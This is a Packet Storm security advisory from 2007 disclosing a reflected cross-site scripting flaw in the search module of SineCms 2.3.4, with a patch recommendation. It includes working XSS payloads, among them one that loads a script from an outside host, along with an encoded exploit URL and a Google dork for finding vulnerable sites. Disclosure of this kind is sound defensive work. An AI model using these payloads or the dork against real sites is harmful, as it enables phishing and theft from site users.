sinecms-xss.txt

2007-05-03T00:00:00
ID PACKETSTORM:56336
Type packetstorm
Reporter Nexus
Modified 2007-05-03T00:00:00

Description

                                        
                                            ` . . .   
._ | _. .|_ _. _.;_/  
[_)|(_]\_|[ )(_](_.| \.net  
| ._|   
"SineCms Version 2.3.4 - Non-Persistent XSS Vulnerability"  
by Nexus  
  
1) Infos  
---------  
Date : 2007-04-26 (ISO 8601)  
Product : SineCms  
Version : 2.3.4 (last), prior versions may also be affected  
Vendor : http://sourceforge.net/projects/sine - http://www.sinecms.net  
Vendor Status : 2007-04-26 - Informed!  
  
Description : SineCms is a hypertext-based (web) content management system.
  
Google Dork : "SineCms Version: 2.3.4"  
  
Source : nexus  
E-mail : nexus[at]playhack[dot]net  
Team : Playhack.net Security  
  
  
2) Security Issues  
-------------------  
The Search engine core module is affected by a non-persistent (reflected) cross-site
scripting vulnerability.
The code in "mods/Core/result.php" does not properly sanitize user input: it takes the
submitted search text and echoes it back into the page without any check on its content.
The affected variable is $_GET['stringa']. If we submit a search string such as:
"><script>alert(1);</script>
the site produces a URL like:
host/path/mods.php?mods=Core&page=result&stringa=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&campo=all&criterio=tutte&ordine=decrescente

and the page executes the JavaScript code.
The script only checks for apostrophes (single quotes), which is trivially bypassed,
since a payload that loads a remote script needs none:
"><script src=http://host.com/script.js></script>

This kind of vulnerability can be used to carry out phishing attacks, or anything else
that can be achieved through an XSS flaw.
  
  
3) Patch  
---------  
  
Edit the core source code and properly sanitize the input data: HTML-encode $_GET['stringa']
(for example with htmlspecialchars() and ENT_QUOTES) before echoing it into the page, instead
of only stripping apostrophes.
  